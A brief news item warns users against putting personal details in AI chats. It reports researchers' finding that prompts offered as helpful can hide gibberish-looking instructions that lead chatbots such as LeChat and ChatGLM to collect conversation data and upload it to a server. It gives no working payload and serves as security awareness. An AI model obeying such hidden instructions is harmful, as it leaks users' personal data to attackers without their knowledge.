LLM

The Risks of Including Personal Details in AI Chats

PSA: Here's another reason not to include personal details in AI chats

Security researchers have discovered a way to instruct AI chatbots to gather personal data from conversations and upload it to a server, raising concerns about privacy and security in AI chats. The researchers tested the method on two large language models, LeChat by French AI company Mistral and Chinese chatbot ChatGLM, and found that users could be offered seemingly helpful prompts which secretly contain malicious instructions obfuscated as gibberish only understandable by the AI. Experts warn that as more people use AI assistants and grant them greater authority over their activities, these kinds of attacks are likely to become more widespread.

#LLM

Latest News

xBloom

xBloom Studio: The Coffee Maker That Puts Science in Your Cup

2 weeks ago

HomeKit

Matter 1.4.1 Update: Daniel Moneta Discusses Future of Smart Home Interoperability on HomeKit Insider Podcast

2 weeks ago

Mac

OWC Unleashes Thunderbolt 5 Docking Station with 11 Ports for M4 MacBook Pro

2 weeks ago

Technology

Nomad Unveils Ultra-Slim 100W Power Adapter for On-the-Go Charging

2 weeks ago

iOS

iOS 19 Set to Debut Bilingual Arabic Keyboard and Virtual Calligraphy Pen for Apple Pencil

2 weeks ago

Apple

Big Tech Lawyers Accused of Encouraging Clients to Break the Law

2 weeks ago